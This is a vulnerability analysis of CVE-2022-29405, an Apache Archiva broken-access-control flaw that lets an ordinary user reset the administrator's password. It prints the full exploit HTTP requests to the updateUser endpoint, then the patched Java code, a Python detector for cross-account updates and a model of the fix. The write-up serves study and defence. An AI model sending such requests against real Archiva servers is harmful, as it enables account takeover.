CVE-2022-29405: Apache Archiva arbitrary user password reset, vulnerability analysis


    Apache Archiva is an extensible artifact repository management system. It integrates with build tools such as Maven, Continuum and Ant. Archiva provides remote repository proxying, role-based access control, artifact distribution, maintenance and querying, usage report generation, and a web-based management interface.

    Ordinary users created by an Apache Archiva administrator are granted permissions incorrectly, so an ordinary user can modify any user's account information.

    Affected versions

    Apache Archiva, all versions (<= 2.2.7)

    Project address: GitHub - apache/archiva: Apache Archiva Repository (https://github.com/apache/archiva)

    Reproduction

    1. Create an administrator account admin:admin123

    2. Create an ordinary account user:user123 (tick "validated")

    3. Capture the request that edits the admin account's password

    POST /restServices/redbackServices/userService/updateUser HTTP/1.1
    Host: 10.66.64.106:8080
    Content-Length: 752
    Accept: application/json, text/javascript, */*; q=0.01
    X-XSRF-TOKEN: [replace with your value]
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
    Content-Type: application/json
    Origin: http://10.66.64.106:8080
    Referer: http://10.66.64.106:8080/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: [replace with your value]
    Connection: close

    {"username":"admin","password":"admin123","confirmPassword":"admin123","fullName":"the administrator","email":"admin@admin.com","permanent":true,"validated":true,"timestampAccountCreation":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","timestampLastLogin":null,"timestampLastPasswordChange":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","locked":false,"passwordChangeRequired":false,"assignedRoles":["Global Repository Manager","Global Repository Observer","Repository Manager - internal","Repository Manager - snapshots","Repository Observer - internal","Repository Observer - snapshots","System Administrator","User Administrator"],"modified":true,"readOnly":false,"userManagerId":"jdo","rememberme":false,"validationToken":null,"logged":false}

    4. Log in as the ordinary user, fill in the placeholder values, and send the request captured above

    POST /restServices/redbackServices/userService/updateUser HTTP/1.1
    Host: 10.66.64.106:8080
    Content-Length: 750
    Accept: application/json, text/javascript, */*; q=0.01
    X-XSRF-TOKEN: I1ngx29RJKOGWU+mBxHVfK39m8LWeZpH3GGPmN/AVxHaaAa7+TUveJDvO48Z+KgQdclv7P8Zga9ZowMgEW0Q+Pm9q7kq2s0f7M0dUjrvNaislYP18IDjg18zey0jTvGlQlISdTOikY23gVn5+C5AZcJp5mxN3LsB6OWWpFweD4pBgJwUc1ij38n4w5nOUA0l4k8/Q3YoGDRvKL3mK5QTQVpCDt89dxXI0xpH+VYhLkdOTvJlE1WMXV8XN1Hev/Ipvr6XBlhl2tKRvnnWTD8GgxULnBdFdo6EQ4JBYYoWih8YCbSC6vIQCmyGQhkzulIDnCmqsiLH4s4c9Y6Uqeohnw==
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
    Content-Type: application/json
    Origin: http://10.66.64.106:8080
    Referer: http://10.66.64.106:8080/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=n2pfvjl209zinxflbferxloq; archiva_login=%7B%22username%22%3A%22user%22%2C%22password%22%3Anull%2C%22confirmPassword%22%3Anull%2C%22fullName%22%3A%22user123%22%2C%22email%22%3A%22user123%40user123.com%22%2C%22permanent%22%3Afalse%2C%22validated%22%3Atrue%2C%22timestampAccountCreation%22%3Anull%2C%22timestampLastLogin%22%3Anull%2C%22timestampLastPasswordChange%22%3Anull%2C%22locked%22%3Afalse%2C%22passwordChangeRequired%22%3Afalse%2C%22assignedRoles%22%3A%5B%5D%2C%22modified%22%3Afalse%2C%22readOnly%22%3Afalse%2C%22userManagerId%22%3Anull%2C%22rememberme%22%3Afalse%2C%22validationToken%22%3A%22I1ngx29RJKOGWU%2BmBxHVfK39m8LWeZpH3GGPmN%2FAVxHaaAa7%2BTUveJDvO48Z%2BKgQdclv7P8Zga9ZowMgEW0Q%2BPm9q7kq2s0f7M0dUjrvNaislYP18IDjg18zey0jTvGlQlISdTOikY23gVn5%2BC5AZcJp5mxN3LsB6OWWpFweD4pBgJwUc1ij38n4w5nOUA0l4k8%2FQ3YoGDRvKL3mK5QTQVpCDt89dxXI0xpH%2BVYhLkdOTvJlE1WMXV8XN1Hev%2FIpvr6XBlhl2tKRvnnWTD8GgxULnBdFdo6EQ4JBYYoWih8YCbSC6vIQCmyGQhkzulIDnCmqsiLH4s4c9Y6Uqeohnw%3D%3D%22%2C%22logged%22%3Afalse%7D
    Connection: close

    {"username":"admin","password":"user456","confirmPassword":"user456","fullName":"the administrator","email":"admin@admin.com","permanent":true,"validated":true,"timestampAccountCreation":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","timestampLastLogin":null,"timestampLastPasswordChange":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","locked":false,"passwordChangeRequired":false,"assignedRoles":["Global Repository Manager","Global Repository Observer","Repository Manager - internal","Repository Manager - snapshots","Repository Observer - internal","Repository Observer - snapshots","System Administrator","User Administrator"],"modified":true,"readOnly":false,"userManagerId":"jdo","rememberme":false,"validationToken":null,"logged":false}

    5. Log in to the administrator account with the modified password

    Now check whether the password of the administrator account admin has been changed to user456.

    The vulnerability is confirmed.

    Vulnerability analysis

    The updateUser method in userService

    This method requires the user-management-user-edit permission, but an ordinary user also holds this permission.

    Following the implementation of updateUser:

    Every parameter comes from the frontend, including the username of the account to update, so a caller can modify an account other than their own (broken access control).
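    The defining trait of the captured request above is that the archiva_login cookie names one account ("user") while the JSON body names another ("admin"). The following script is an added example (not from the original post or from Archiva) that parses a raw updateUser request, decodes the URL-encoded archiva_login cookie, and flags cross-account updates together with the sensitive fields they touch. The request embedded in it is constructed: it mirrors the shape of the captured one but replaces the session id and XSRF token with placeholders and trims the cookie's JSON to the fields the check needs.

```python
import json
from urllib.parse import unquote

# Constructed sample: the shape of the captured updateUser request from the
# write-up, with the session id and XSRF token replaced by placeholders.
SAMPLE_REQUEST = (
    "POST /restServices/redbackServices/userService/updateUser HTTP/1.1\r\n"
    "Host: 10.66.64.106:8080\r\n"
    "Content-Type: application/json\r\n"
    "X-XSRF-TOKEN: TOKEN-PLACEHOLDER\r\n"
    "Cookie: JSESSIONID=SESSION-PLACEHOLDER; archiva_login="
    "%7B%22username%22%3A%22user%22%2C%22validated%22%3Atrue%2C%22assignedRoles%22%3A%5B%5D%7D\r\n"
    "Connection: close\r\n"
    "\r\n"
    '{"username":"admin","password":"user456","confirmPassword":"user456",'
    '"validated":true,"locked":false,"permanent":true}'
)

UPDATE_USER_PATH = "/restServices/redbackServices/userService/updateUser"
# Fields that change account state; worth listing when set on someone else's account.
SENSITIVE_FIELDS = ("password", "validated", "locked", "permanent", "passwordChangeRequired")


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def session_username(cookie_header):
    """Return the username stored in the archiva_login cookie, or None if absent/unparseable."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "archiva_login":
            try:
                return json.loads(unquote(value)).get("username")
            except (ValueError, AttributeError):
                return None
    return None


def inspect_update_user(raw):
    """Flag updateUser calls whose target account differs from the session's account.

    Returns None for requests that are not updateUser calls or that only edit the
    caller's own profile (the endpoint's intended use); otherwise a finding dict.
    """
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or path != UPDATE_USER_PATH:
        return None
    actor = session_username(headers.get("cookie", ""))
    try:
        payload = json.loads(body)
    except ValueError:
        return {"reason": "unparseable updateUser body", "session_user": actor}
    target = payload.get("username")
    if actor is not None and actor == target:
        return None
    return {
        "reason": "cross-account updateUser" if actor else "updateUser without archiva_login cookie",
        "session_user": actor,
        "target_user": target,
        "sensitive_fields": [f for f in SENSITIVE_FIELDS if f in payload],
    }


if __name__ == "__main__":
    print(inspect_update_user(SAMPLE_REQUEST))
```

    The archiva_login cookie is client-supplied, so this check is only suitable for triaging captured traffic or proxy logs; the authoritative comparison has to happen server-side against the authenticated session, which is what the fix described below the analysis does.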

    Subsequent fix

    public Boolean updateUser(User user) throws RedbackServiceException {
        RedbackRequestInformation redbackRequestInformation = RedbackAuthenticationThreadLocal.get();
        if (redbackRequestInformation != null && redbackRequestInformation.getUser() != null) {
            if (user == null) {
                throw new RedbackServiceException(new ErrorMessage("user parameter is mandatory"), Status.BAD_REQUEST.getStatusCode());
            } else if (!StringUtils.equals(redbackRequestInformation.getUser().getUsername(), user.getUsername()) && !StringUtils.equals(redbackRequestInformation.getUser().getUsername(), "admin")) {
                throw new RedbackServiceException(new ErrorMessage("you can update only your profile"), Status.FORBIDDEN.getStatusCode());
            } else {
                try {
                    org.apache.archiva.redback.users.User rawUser = this.userManager.findUser(user.getUsername(), false);
                    rawUser.setFullName(user.getFullName());
                    rawUser.setEmail(user.getEmail());
                    rawUser.setValidated(user.isValidated());
                    rawUser.setLocked(user.isLocked());
                    rawUser.setPassword(user.getPassword());
                    rawUser.setPasswordChangeRequired(user.isPasswordChangeRequired());
                    rawUser.setPermanent(user.isPermanent());
                    this.userManager.updateUser(rawUser);
                    return Boolean.TRUE;
                } catch (UserNotFoundException var4) {
                    throw new RedbackServiceException(var4.getMessage());
                } catch (UserManagerException var5) {
                    throw new RedbackServiceException(new ErrorMessage(var5.getMessage()));
                }
            }
        } else {
            this.log.warn("RedbackRequestInformation from ThreadLocal is null");
            throw new RedbackServiceException(new ErrorMessage("you must be logged to update your profile"), Status.FORBIDDEN.getStatusCode());
        }
    }

    The username passed from the frontend is now checked again: it must match the username in redbackRequestInformation (the authenticated session), unless the authenticated user is "admin".
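    To make the effect of that check concrete, here is an added Python model (not Archiva's code, and not from the original post) of the updateUser service before and after the fix. `authenticated_username` stands in for the identity that RedbackAuthenticationThreadLocal supplies, `UserStore` stands in for the JDO-backed user manager, and `demo()` replays the write-up's scenario, an ordinary user named "user" sending a body whose username is "admin", against both versions.

```python
from dataclasses import dataclass


class Forbidden(Exception):
    """Stands in for RedbackServiceException with HTTP 403."""


@dataclass
class StoredUser:
    username: str
    password: str
    validated: bool = True
    locked: bool = False
    permanent: bool = False


class UserStore:
    """In-memory stand-in for the userManager used by the real service."""

    def __init__(self, users):
        self.users = {u.username: u for u in users}

    def find(self, username):
        return self.users[username]


def update_user_vulnerable(store, authenticated_username, payload):
    """Pre-fix behaviour: every field, including the target username, is taken from the body.

    Any caller holding user-management-user-edit (which ordinary users have) can
    therefore rewrite any account; authenticated_username is never consulted.
    """
    raw = store.find(payload["username"])
    raw.password = payload["password"]
    raw.validated = payload.get("validated", raw.validated)
    raw.locked = payload.get("locked", raw.locked)
    raw.permanent = payload.get("permanent", raw.permanent)
    return True


def update_user_fixed(store, authenticated_username, payload):
    """Post-fix behaviour: the body's username must equal the session's username, or the session must be 'admin'."""
    if authenticated_username is None:
        raise Forbidden("you must be logged to update your profile")
    if payload["username"] != authenticated_username and authenticated_username != "admin":
        raise Forbidden("you can update only your profile")
    # Once the identity check passes, the field copying is unchanged from the vulnerable version.
    return update_user_vulnerable(store, authenticated_username, payload)


def demo():
    """Replay the write-up's scenario; returns (outcome, admin password afterwards) per version."""
    results = {}
    for name, handler in (("vulnerable", update_user_vulnerable), ("fixed", update_user_fixed)):
        store = UserStore([StoredUser("admin", "admin123", permanent=True), StoredUser("user", "user123")])
        payload = {"username": "admin", "password": "user456", "confirmPassword": "user456", "permanent": True}
        try:
            handler(store, "user", payload)  # session belongs to 'user', body targets 'admin'
            outcome = "accepted"
        except Forbidden as e:
            outcome = f"rejected: {e}"
        results[name] = (outcome, store.find("admin").password)
    return results


if __name__ == "__main__":
    for version, (outcome, admin_password) in demo().items():
        print(f"{version}: {outcome}; admin password is now {admin_password!r}")
```

    Two things the model makes visible about the fix as printed above: the special case is keyed on the literal username "admin" rather than on a role, and the body's validated, locked and permanent values are still copied into the stored record for the permitted cases (self-update or an "admin" session), so the identity check is the only thing standing between the client-supplied fields and the account.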

    Original address: https://blog.csdn.net/shelter1234567/article/details/137235659